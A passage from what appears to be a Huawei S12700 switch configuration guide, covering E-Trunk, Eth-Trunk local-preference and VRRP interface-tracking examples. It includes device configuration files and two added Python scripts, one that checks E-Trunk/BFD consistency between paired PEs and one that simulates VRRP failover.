vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 3.3.3.9
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
mpls
mpls ldp
#
e-trunk 1
priority 10
peer-address 2.2.2.9 source-address 1.1.1.9
timer hello 9
timer hold-on-failure multiplier 3
e-trunk track bfd-session session-name hello1
#
interface Eth-Trunk10
port link-type trunk
mode lacp
e-trunk 1
#
interface Eth-Trunk10.1
dot1q termination vid 10
l2 binding vsi ldp1
#
interface GigabitEthernet1/0/1
eth-trunk 10
#
interface GigabitEthernet1/0/2
eth-trunk 10
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bfd hello1 bind peer-ip 2.2.2.9 source-ip 1.1.1.9
discriminator local 1
discriminator remote 2
commit
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return

l Configuration file of PE2


#
sysname PE2
#
vlan batch 200
#
lacp e-trunk system-id 00e0-fc00-0000
lacp e-trunk priority 1
#
bfd
#
mpls lsr-id 2.2.2.9
mpls
#
mpls l2vpn
#
vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 3.3.3.9
#
mpls ldp
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
mpls
mpls ldp
#
e-trunk 1
priority 20
peer-address 1.1.1.9 source-address 2.2.2.9
timer hello 9
timer hold-on-failure multiplier 3
e-trunk track bfd-session session-name hello2
#
interface Eth-Trunk10
port link-type trunk
mode lacp
e-trunk 1
#
interface Eth-Trunk10.1
dot1q termination vid 10
l2 binding vsi ldp1
#
interface GigabitEthernet1/0/1
eth-trunk 10
#
interface GigabitEthernet1/0/2
eth-trunk 10
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 200
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
bfd hello2 bind peer-ip 1.1.1.9 source-ip 2.2.2.9
discriminator local 2
discriminator remote 1
commit
#
ospf 1
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 10.1.2.0 0.0.0.255
#
return

l Configuration file of PE3


#
sysname PE3
#
vlan batch 100 200
#
mpls lsr-id 3.3.3.9
mpls
#
mpls l2vpn
#
vsi ldp1 static
pwsignal ldp
vsi-id 2
peer 1.1.1.9
peer 2.2.2.9
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif200
ip address 10.1.2.2 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3.1
dot1q termination vid 10
l2 binding vsi ldp1
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
ospf 1
area 0.0.0.0
network 3.3.3.9 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
#
return
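The procedure above only works if a handful of settings are mirrored between PE1 and PE2: the same LACP system ID and LACP priority, swapped peer-address/source-address pairs, a tracked BFD session bound to exactly the E-Trunk's addresses, and mirrored BFD discriminators. The following Python script is an added example written for this page, not Huawei code or part of this guide: it parses configuration files in the layout shown above and reports whichever of those invariants fails. The pe_config template reproduces only the relevant blocks of the PE1 and PE2 files, and the mis-typed PE2 variant is constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional


def parse_blocks(config: str) -> List[List[str]]:
    """Split a VRP-style configuration file into its '#'-delimited blocks of lines."""
    blocks: List[List[str]] = [[]]
    for line in (raw.strip() for raw in config.splitlines()):
        if line in ("#", "return"):
            blocks.append([])
        elif line:
            blocks[-1].append(line)
    return [b for b in blocks if b]


def _find(pattern: str, lines: List[str]) -> Optional[re.Match]:
    """First line of a block that matches pattern (anchored at the line start), or None."""
    return next((m for line in lines if (m := re.match(pattern, line))), None)


def _g(m: Optional[re.Match], n: int = 1) -> Optional[str]:
    return m.group(n) if m else None


def extract(config: str) -> Dict:
    """Collect the LACP, E-Trunk and BFD-session settings of one PE."""
    info: Dict = {"lacp_id": None, "lacp_pri": None, "etrunks": {}, "bfd": {}}
    for block in parse_blocks(config):
        head = block[0]
        # Global LACP settings; both PEs must share them so CE1 sees a single LACP partner.
        for key, pat in (("lacp_id", r"lacp e-trunk system-id (\S+)"),
                         ("lacp_pri", r"lacp e-trunk priority (\d+)")):
            if m := _find(pat, block):
                info[key] = m.group(1).lower()
        if m := re.fullmatch(r"e-trunk (\d+)", head):  # E-Trunk view
            addr = _find(r"peer-address (\S+) source-address (\S+)", block)
            info["etrunks"][m.group(1)] = {
                "priority": _g(_find(r"priority (\d+)", block)),
                "peer": _g(addr), "source": _g(addr, 2),
                "bfd_session": _g(_find(r"e-trunk track bfd-session session-name (\S+)", block))}
        if m := re.fullmatch(r"bfd (\S+) bind peer-ip (\S+) source-ip (\S+)", head):  # BFD session
            info["bfd"][m.group(1)] = {
                "peer": m.group(2), "source": m.group(3),
                "local": _g(_find(r"discriminator local (\d+)", block)),
                "remote": _g(_find(r"discriminator remote (\d+)", block))}
    return info


def _tracked_bfd(name: str, info: Dict, et_id: str, et: Dict, out: List[str]) -> Optional[Dict]:
    """Check the BFD session an E-Trunk tracks; return its settings, or None if unusable."""
    sess = et["bfd_session"]
    s = info["bfd"].get(sess) if sess else None
    if s is None:
        out.append(f"{name}: E-Trunk {et_id} tracks no defined BFD session")
        return None
    # Rule from the procedure: the BFD session's local and remote IP addresses must equal the E-Trunk's.
    if (s["peer"], s["source"]) != (et["peer"], et["source"]):
        out.append(f"{name}: BFD session {sess} addresses differ from E-Trunk {et_id}")
    return s


def check_pair(cfg_a: str, cfg_b: str, name_a: str = "PE1", name_b: str = "PE2") -> List[str]:
    """Return every mismatch that would stop the two PEs acting as one E-Trunk peer pair."""
    a, b = extract(cfg_a), extract(cfg_b)
    out: List[str] = []
    if a["lacp_id"] is None or (a["lacp_id"], a["lacp_pri"]) != (b["lacp_id"], b["lacp_pri"]):
        out.append("LACP E-Trunk system ID and priority must be identical on both PEs")
    for et_id in sorted(set(a["etrunks"]) | set(b["etrunks"])):
        ea, eb = a["etrunks"].get(et_id), b["etrunks"].get(et_id)
        if ea is None or eb is None:
            out.append(f"E-Trunk {et_id} is defined on only one PE")
            continue
        if (ea["peer"], ea["source"]) != (eb["source"], eb["peer"]):
            out.append(f"E-Trunk {et_id}: peer-address/source-address are not mirrored")
        if ea["priority"] == eb["priority"]:
            out.append(f"E-Trunk {et_id}: equal priorities, no explicitly preferred master")
        sa = _tracked_bfd(name_a, a, et_id, ea, out)
        sb = _tracked_bfd(name_b, b, et_id, eb, out)
        if sa and sb and (sa["local"], sa["remote"]) != (sb["remote"], sb["local"]):
            out.append(f"E-Trunk {et_id}: BFD discriminators are not mirrored")
    return out


def pe_config(priority: int, local: str, remote: str, sess: str, ld: int, rd: int) -> str:
    """The E-Trunk-relevant blocks of a PE configuration file, in the layout shown above."""
    return f"""#
lacp e-trunk system-id 00e0-fc00-0000
lacp e-trunk priority 1
#
e-trunk 1
priority {priority}
peer-address {remote} source-address {local}
e-trunk track bfd-session session-name {sess}
#
bfd {sess} bind peer-ip {remote} source-ip {local}
discriminator local {ld}
discriminator remote {rd}
#
"""

# Values taken from the PE1 and PE2 configuration files above.
PE1_CONFIG = pe_config(10, "1.1.1.9", "2.2.2.9", "hello1", 1, 2)
PE2_CONFIG = pe_config(20, "2.2.2.9", "1.1.1.9", "hello2", 2, 1)
# Constructed mis-typed PE2: the BFD source-ip drifts from the E-Trunk and the remote discriminator is wrong.
PE2_BROKEN = PE2_CONFIG.replace("source-ip 2.2.2.9", "source-ip 2.2.2.10").replace("discriminator remote 1", "discriminator remote 3")
```

Running check_pair on the two files above yields no findings; on the mis-typed variant it reports the BFD address mismatch on PE2 and the non-mirrored discriminators.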

6.2.4 Example for Configuring an Eth-Trunk Interface to Preferentially Forward Local Traffic

Preferentially Forwarding Local Traffic on an Eth-Trunk


In a CSS, an Eth-Trunk is configured as the outbound interface of traffic to ensure reliable
transmission. Member interfaces of the Eth-Trunk are located on different chassis. When
devices in the CSS forward traffic, the Eth-Trunk may select an inter-chassis member
interface based on the hash algorithm. The cable bandwidth between devices in the CSS is
limited, so inter-chassis traffic forwarding occupies bandwidth resources between devices,
lowering traffic forwarding efficiency. To address this issue, you can enable an Eth-Trunk to
preferentially forward local traffic.

Configuration Notes
l This example applies to all versions of the S12700.
l If active interfaces of an Eth-Trunk on the local device have sufficient bandwidth to
forward traffic, you can configure the Eth-Trunk to preferentially forward local traffic.
This function improves traffic forwarding efficiency and increases bandwidth capacity
between devices in the CSS.
l If active interfaces of an Eth-Trunk on the local device do not have sufficient bandwidth
to forward traffic, you can configure the Eth-Trunk not to preferentially forward local
traffic. In this case, some traffic on the local device is forwarded through member
interfaces of an Eth-Trunk on another device, preventing packet loss.

Networking Requirements
On the network shown in Figure 6-6, CSS technology is used to increase the total capacity of
devices. Switch3 and Switch4 are connected through stack cables to form a logical switch. To
implement backup between devices and improve reliability, physical interfaces on the two
switches are added to an Eth-Trunk. In normal situations, when checking information about
member interfaces on the PE, you can see that traffic from VLAN 2 and VLAN 3 is
forwarded through GE1/0/1 and GE1/0/2 respectively. This occupies bandwidth between the
devices in the CSS and reduces traffic forwarding efficiency.
To ensure that traffic from VLAN 2 is forwarded through GE1/0/1 and traffic from VLAN 3
is forwarded through GE1/0/2, you can configure the Eth-Trunk to preferentially forward
local traffic.


Figure 6-6 Preferentially forwarding local traffic
[Figure: the PE (GE1/0/1, GE1/0/2) connects through Eth-Trunk 10 to the CSS formed by Switch3 (GE1/1/0/4) and Switch4 (GE2/1/0/4), which are joined by a CSS cable. Switch3 GE1/1/0/3 connects to Switch1 GE1/0/2 and Switch4 GE2/1/0/3 connects to Switch2 GE1/0/2; Switch1 GE1/0/1 carries VLAN 2 and Switch2 GE1/0/1 carries VLAN 3. Legend: CSS cable, VLAN 2 data flow, VLAN 3 data flow.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create an Eth-Trunk.
2. Add member interfaces to the Eth-Trunk.
3. Enable the Eth-Trunk to preferentially forward local traffic.
4. Add interfaces to VLANs to implement Layer 2 connectivity.

Procedure
Step 1 Create an Eth-Trunk and configure the ID of a VLAN from which packets can pass through
the Eth-Trunk.
# Configure the CSS.
<HUAWEI> system-view
[HUAWEI] sysname CSS
[CSS] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-Trunk 10.
[CSS-Eth-Trunk10] port link-type trunk //Set the link type of the interface to trunk.
[CSS-Eth-Trunk10] port trunk allow-pass vlan all //Configure the interface to allow all VLANs.
[CSS-Eth-Trunk10] quit

# Configure the aggregation switch PE.


<HUAWEI> system-view
[HUAWEI] sysname PE
[PE] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-Trunk 10.
[PE-Eth-Trunk10] port link-type trunk //Set the link type of the interface to trunk.
[PE-Eth-Trunk10] port trunk allow-pass vlan all //Configure the interface to allow all VLANs.
[PE-Eth-Trunk10] quit

Step 2 Add member interfaces to the Eth-Trunk.


# Configure the CSS.
[CSS] interface gigabitethernet 1/1/0/4
[CSS-GigabitEthernet1/1/0/4] eth-trunk 10 //Add GE1/1/0/4 to Eth-Trunk 10.
[CSS-GigabitEthernet1/1/0/4] quit
[CSS] interface gigabitethernet 2/1/0/4
[CSS-GigabitEthernet2/1/0/4] eth-trunk 10 //Add GE2/1/0/4 to Eth-Trunk 10.
[CSS-GigabitEthernet2/1/0/4] quit

# Configure the PE.


[PE] interface gigabitethernet 1/0/1
[PE-GigabitEthernet1/0/1] eth-trunk 10 //Add GE1/0/1 to Eth-Trunk 10.
[PE-GigabitEthernet1/0/1] quit
[PE] interface gigabitethernet 1/0/2
[PE-GigabitEthernet1/0/2] eth-trunk 10 //Add GE1/0/2 to Eth-Trunk 10.
[PE-GigabitEthernet1/0/2] quit

Step 3 Configure the Eth-Trunk on devices in the CSS to preferentially forward local traffic.
[CSS] interface eth-trunk 10
[CSS-Eth-Trunk10] local-preference enable //Enable Eth-Trunk 10 to preferentially forward local traffic.
[CSS-Eth-Trunk10] quit

NOTE
By default, an Eth-Trunk is enabled to preferentially forward local traffic. If the local-preference enable
command is executed, the system displays the message "Error: The local preferential forwarding mode
has been configured."

Step 4 Configure Layer 2 forwarding.


# Configure the CSS.
[CSS] vlan batch 2 3
[CSS] interface gigabitethernet 1/1/0/3
[CSS-GigabitEthernet1/1/0/3] port link-type trunk
[CSS-GigabitEthernet1/1/0/3] port trunk allow-pass vlan 2
[CSS-GigabitEthernet1/1/0/3] quit
[CSS] interface gigabitethernet 2/1/0/3
[CSS-GigabitEthernet2/1/0/3] port link-type trunk
[CSS-GigabitEthernet2/1/0/3] port trunk allow-pass vlan 3
[CSS-GigabitEthernet2/1/0/3] quit

# Configure access switch Switch1.


<HUAWEI> system-view
[HUAWEI] sysname Switch1
[Switch1] vlan 2
[Switch1-vlan2] quit
[Switch1] interface gigabitethernet 1/0/1
[Switch1-GigabitEthernet1/0/1] port link-type trunk
[Switch1-GigabitEthernet1/0/1] port trunk allow-pass vlan 2


[Switch1-GigabitEthernet1/0/1] quit
[Switch1] interface gigabitethernet 1/0/2
[Switch1-GigabitEthernet1/0/2] port link-type trunk
[Switch1-GigabitEthernet1/0/2] port trunk allow-pass vlan 2
[Switch1-GigabitEthernet1/0/2] quit

# Configure access switch Switch2.


<HUAWEI> system-view
[HUAWEI] sysname Switch2
[Switch2] vlan 3
[Switch2-vlan3] quit
[Switch2] interface gigabitethernet 1/0/1
[Switch2-GigabitEthernet1/0/1] port link-type trunk
[Switch2-GigabitEthernet1/0/1] port trunk allow-pass vlan 3
[Switch2-GigabitEthernet1/0/1] quit
[Switch2] interface gigabitethernet 1/0/2
[Switch2-GigabitEthernet1/0/2] port link-type trunk
[Switch2-GigabitEthernet1/0/2] port trunk allow-pass vlan 3
[Switch2-GigabitEthernet1/0/2] quit

Step 5 Verify the configuration.

After the configuration is complete, run the display trunkmembership eth-trunk command
in any view to check information about member interfaces of the Eth-Trunk.

The display on the CSS is used as an example.


<CSS> display trunkmembership eth-trunk 10
Trunk ID: 10
Used status: VALID
TYPE: ethernet
Working Mode : Normal
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 2
Operate status: up

Interface GigabitEthernet1/1/0/4, valid, operate up, weight=1


Interface GigabitEthernet2/1/0/4, valid, operate up, weight=1

----End

Configuration Files
l Configuration file of the CSS
#
sysname CSS
#
vlan batch 2 3
#
interface Eth-Trunk10
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface GigabitEthernet1/1/0/3
port link-type trunk
port trunk allow-pass vlan 2
#
interface GigabitEthernet2/1/0/3
port link-type trunk
port trunk allow-pass vlan 3
#
interface GigabitEthernet1/1/0/4
eth-trunk 10
#
interface GigabitEthernet2/1/0/4
eth-trunk 10
#
return

l Configuration file of the PE


#
sysname PE
#
interface Eth-Trunk10
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface GigabitEthernet1/0/1
eth-trunk 10
#
interface GigabitEthernet1/0/2
eth-trunk 10
#
return

l Configuration file of Switch1


#
sysname Switch1
#
vlan batch 2
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2
#
return

l Configuration file of Switch2


#
sysname Switch2
#
vlan batch 3
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 3
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 3
#
return

6.2.5 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status

Association Between VRRP and the Interface Status


Additional technologies are required to enhance the VRRP active/standby function. For
example, when the link from the master to a network is disconnected, VRRP cannot detect the
fault and an active/standby switchover cannot be performed. As a result, hosts cannot
remotely access the network through the master. To address this issue, you can configure
association between VRRP and the interface status.

When the master detects that the uplink interface fails, the master reduces its priority to be
lower than the priority of the backup and immediately sends VRRP packets. After the backup
receives the VRRP packets, it detects that the priority in the VRRP packets is lower than its
priority and switches to the master. This ensures correct traffic forwarding.

Configuration Notes
l Ensure that each device of the same VRRP group is configured with the same VRID.
l A VRRP group can be associated with a maximum of eight interfaces on a device.
Association between a VRRP group and the interface status cannot be configured on the
device as the IP address owner.
l The following describes the applicable product models and versions.

Table 6-1 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 6-7, the user hosts are dual-homed to SwitchA and SwitchB through the
switch. The requirements are as follows:
l The hosts use SwitchA as the default gateway to connect to the Internet. When SwitchA
or the downlink/uplink fails, SwitchB functions as the gateway to implement gateway
backup.
l The bandwidth of the link between SwitchA and SwitchB is increased to implement link
backup and improve link reliability.
l After SwitchA recovers, it becomes the gateway within 20s.

Figure 6-7 Networking of association between VRRP and the interface status
[Figure: aggregation layer and core layer. The aggregation switch (Switch) connects through GE1/0/1 and GE1/0/2 to the core switches SwitchA (Master) and SwitchB (Backup), which are linked to each other by Eth-Trunk1. SwitchA GE1/0/1 (192.168.1.1/24) connects to SwitchC GE1/0/1 (192.168.1.2/24); SwitchB (192.168.2.1/24) connects to SwitchC GE1/0/2 (192.168.2.2/24); SwitchC (172.16.1.1/24) connects to the Internet. User VLANs 101 to 116 ... 165 to 180 attach below the Switch.]


Configuration Roadmap
A VRRP group in active/standby mode is used to implement gateway backup. The
configuration roadmap is as follows:

1. Assign an IP address to each interface and configure a routing protocol to ensure
network connectivity.
2. Configure VLAN aggregation on SwitchA and SwitchB to implement Layer 2 isolation
and Layer 3 connectivity of VLANs 101 to 180 and save IP addresses.
3. Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-
Trunk to increase the link bandwidth and implement link backup.
4. Configure a VRRP group between SwitchA and SwitchB. Set a higher priority for
SwitchA so that SwitchA functions as the master to forward traffic, and set the
preemption delay to 20s on SwitchA. Set a lower priority for SwitchB so that SwitchB
functions as the backup.
5. Associate VRRP with GE1/0/1 and GE1/0/2 on SwitchA so that the VRRP group can
detect the fault of the master and perform an active/standby switchover immediately.
NOTE

SwitchA and SwitchB are core switches, and the switch is an aggregation switch.
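The mechanism described above (the master lowers its priority when a tracked uplink fails, the backup takes over at once, and the recovered master reclaims the gateway role only after its preemption delay) as an added example: a simplified Python model written for this page, not Huawei's VRRP implementation. The priorities 120/100 and the reduction of 30 per tracked interface are assumed values; only the 20 s preemption delay on SwitchA and the tracked interfaces GE1/0/1 and GE1/0/2 come from the roadmap above.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass
class VrrpRouter:
    """One member of a VRRP group with interface tracking and a preemption delay."""
    name: str
    priority: int                       # configured VRRP priority (assumed values in the scenario)
    preempt_delay: int = 0              # seconds a higher-priority backup waits before taking over
    tracked: Dict[str, int] = field(default_factory=dict)  # interface -> priority reduction while down
    down: Set[str] = field(default_factory=set)            # tracked interfaces currently failed
    state: str = "Backup"
    pending_since: Optional[int] = None  # time this router first became entitled to preempt

    def effective_priority(self) -> int:
        """Configured priority minus the reduction of every failed tracked interface."""
        return max(1, self.priority - sum(self.tracked.get(i, 0) for i in self.down))


class VrrpGroup:
    """Election among routers sharing one VRID, driven by interface events and clock ticks (s)."""

    def __init__(self, routers: List[VrrpRouter]) -> None:
        self.routers = {r.name: r for r in routers}
        self.log: List[str] = []
        self.elect(0)

    def master(self) -> Optional[str]:
        return next((r.name for r in self.routers.values() if r.state == "Master"), None)

    def interface_down(self, t: int, router: str, iface: str) -> None:
        """A tracked interface fails: the owner lowers its priority and advertises it at once."""
        self.routers[router].down.add(iface)
        self.elect(t)

    def interface_up(self, t: int, router: str, iface: str) -> None:
        """The interface recovers and the configured priority is restored."""
        self.routers[router].down.discard(iface)
        self.elect(t)

    def tick(self, t: int) -> None:
        """Periodic advertisement exchange; lets a pending preemption delay expire."""
        self.elect(t)

    def elect(self, t: int) -> None:
        """Hand Master to the highest effective priority, honouring that router's preempt delay."""
        best = max(self.routers.values(), key=VrrpRouter.effective_priority)  # ties not modelled
        for r in self.routers.values():
            if r is not best:
                r.pending_since = None
        if best.state == "Master":
            return
        if best.pending_since is None:
            best.pending_since = t
        no_master = self.master() is None  # nothing to preempt, so no delay at start-up
        if no_master or t - best.pending_since >= best.preempt_delay:
            for r in self.routers.values():
                r.state = "Backup"
            best.state, best.pending_since = "Master", None
            self.log.append(f"t={t}s: {best.name} becomes Master (priority {best.effective_priority()})")


def scenario() -> List[str]:
    """Uplink failure on SwitchA, takeover by SwitchB, then SwitchA's delayed return as gateway."""
    group = VrrpGroup([
        VrrpRouter("SwitchA", 120, preempt_delay=20, tracked={"GE1/0/1": 30, "GE1/0/2": 30}),
        VrrpRouter("SwitchB", 100),
    ])
    group.interface_down(0, "SwitchA", "GE1/0/1")  # SwitchA drops to 90 < 100: SwitchB takes over now
    group.interface_up(10, "SwitchA", "GE1/0/1")   # back to 120, but SwitchA must wait 20 s
    for t in (20, 29, 30):                          # SwitchA regains Master at t=30 s
        group.tick(t)
    return group.log


if __name__ == "__main__":
    print("\n".join(scenario()))
```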

Procedure
Step 1 Configure devices to ensure network connectivity.

# Assign an IP address to each interface on core devices. SwitchA is used as an example. The
configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned
here. For details, see the configuration files.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 11 to 15 101 to 180 301 to 305 400
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 400
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 101 to 180
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface vlanif 11
[SwitchA-Vlanif11] ip address 10.1.1.2 24
[SwitchA-Vlanif11] quit
[SwitchA] interface vlanif 12
[SwitchA-Vlanif12] ip address 10.1.2.2 24
[SwitchA-Vlanif12] quit
[SwitchA] interface vlanif 13
[SwitchA-Vlanif13] ip address 10.1.3.2 24
[SwitchA-Vlanif13] quit
[SwitchA] interface vlanif 14
[SwitchA-Vlanif14] ip address 10.1.4.2 24
[SwitchA-Vlanif14] quit
[SwitchA] interface vlanif 15
[SwitchA-Vlanif15] ip address 10.1.5.2 24
[SwitchA-Vlanif15] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 192.168.1.1 24
[SwitchA-Vlanif400] quit

# Configure Layer 2 transparent transmission on the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 11 to 15 101 to 180
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 11 to 15 101 to 180
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 11 to 15 101 to 180
[Switch-GigabitEthernet1/0/2] quit

# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The
configurations of SwitchB and SwitchC are similar to the configuration of SwitchA, and are
not mentioned here. For details, see the configuration files.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.4.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.5.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 2 Configure a super-VLAN on SwitchA and SwitchB.

# Configure a super-VLAN on SwitchA. The configuration of SwitchB is similar to the
configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] vlan 11
[SwitchA-vlan11] aggregate-vlan
[SwitchA-vlan11] access-vlan 101 to 116 301
[SwitchA-vlan11] quit
[SwitchA] vlan 12
[SwitchA-vlan12] aggregate-vlan
[SwitchA-vlan12] access-vlan 117 to 132 302
[SwitchA-vlan12] quit
[SwitchA] vlan 13
[SwitchA-vlan13] aggregate-vlan
[SwitchA-vlan13] access-vlan 133 to 148 303
[SwitchA-vlan13] quit
[SwitchA] vlan 14
[SwitchA-vlan14] aggregate-vlan
[SwitchA-vlan14] access-vlan 149 to 164 304
[SwitchA-vlan14] quit
[SwitchA] vlan 15
[SwitchA-vlan15] aggregate-vlan
[SwitchA-vlan15] access-vlan 165 to 180 305
[SwitchA-vlan15] quit

Step 3 Configure link aggregation on SwitchA and SwitchB.

# Create Eth-Trunk 1 in LACP mode on SwitchA. The configuration of SwitchB is similar to
the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] mode lacp
[SwitchA-Eth-Trunk1] port link-type trunk
[SwitchA-Eth-Trunk1] undo port trunk allow-pass vlan 1
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 301 to 305
[SwitchA-Eth-Trunk1] quit

# Add member interfaces on SwitchA to Eth-Trunk 1. The configuration of SwitchB is similar
to the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] eth-trunk 1
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] eth-trunk 1
[SwitchA-GigabitEthernet1/0/4] quit

Step 4 Configure VRRP groups on SwitchA and SwitchB.

# Configure a VRRP group on SwitchA, and set the priority of SwitchA to 120 and the
preemption delay to 20s.
[SwitchA] interface vlanif 11
[SwitchA-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchA-Vlanif11] vrrp vrid 1 priority 120 //The default priority of a device in a VRRP group is 100. Set the priority of the master higher than that of the backup.
[SwitchA-Vlanif11] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP group uses immediate preemption by default. Set a preemption delay on the master to prevent traffic interruptions caused by frequent master/backup preemption on an unstable network.
[SwitchA-Vlanif11] vrrp vrid 1 track interface gigabitethernet 1/0/1 reduced 100 //Associate the VRRP group with the uplink interface. Set the priority reduction so that, when the interface goes Down, the priority of the backup becomes higher than that of the master and an active/standby switchover is triggered.
[SwitchA-Vlanif11] vrrp vrid 1 track interface gigabitethernet 1/0/2 reduced 100 //Associate the VRRP group with the downlink interface, with the same priority reduction, so that a downlink failure also triggers an active/standby switchover.
[SwitchA-Vlanif11] vrrp advertise send-mode 301 //Send VRRP packets only in sub-VLAN 301 to save network bandwidth.
[SwitchA-Vlanif11] quit
[SwitchA] interface vlanif 12
[SwitchA-Vlanif12] vrrp vrid 2 virtual-ip 10.1.2.1
[SwitchA-Vlanif12] vrrp vrid 2 priority 120
[SwitchA-Vlanif12] vrrp vrid 2 preempt-mode timer delay 20
[SwitchA-Vlanif12] vrrp vrid 2 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif12] vrrp vrid 2 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif12] vrrp advertise send-mode 302
[SwitchA-Vlanif12] quit
[SwitchA] interface vlanif 13
[SwitchA-Vlanif13] vrrp vrid 3 virtual-ip 10.1.3.1
[SwitchA-Vlanif13] vrrp vrid 3 priority 120
[SwitchA-Vlanif13] vrrp vrid 3 preempt-mode timer delay 20
[SwitchA-Vlanif13] vrrp vrid 3 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif13] vrrp vrid 3 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif13] vrrp advertise send-mode 303
[SwitchA-Vlanif13] quit
[SwitchA] interface vlanif 14
[SwitchA-Vlanif14] vrrp vrid 4 virtual-ip 10.1.4.1
[SwitchA-Vlanif14] vrrp vrid 4 priority 120
[SwitchA-Vlanif14] vrrp vrid 4 preempt-mode timer delay 20
[SwitchA-Vlanif14] vrrp vrid 4 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif14] vrrp vrid 4 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif14] vrrp advertise send-mode 304
[SwitchA-Vlanif14] quit
[SwitchA] interface vlanif 15
[SwitchA-Vlanif15] vrrp vrid 5 virtual-ip 10.1.5.1
[SwitchA-Vlanif15] vrrp vrid 5 priority 120
[SwitchA-Vlanif15] vrrp vrid 5 preempt-mode timer delay 20
[SwitchA-Vlanif15] vrrp vrid 5 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif15] vrrp vrid 5 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif15] vrrp advertise send-mode 305
[SwitchA-Vlanif15] quit

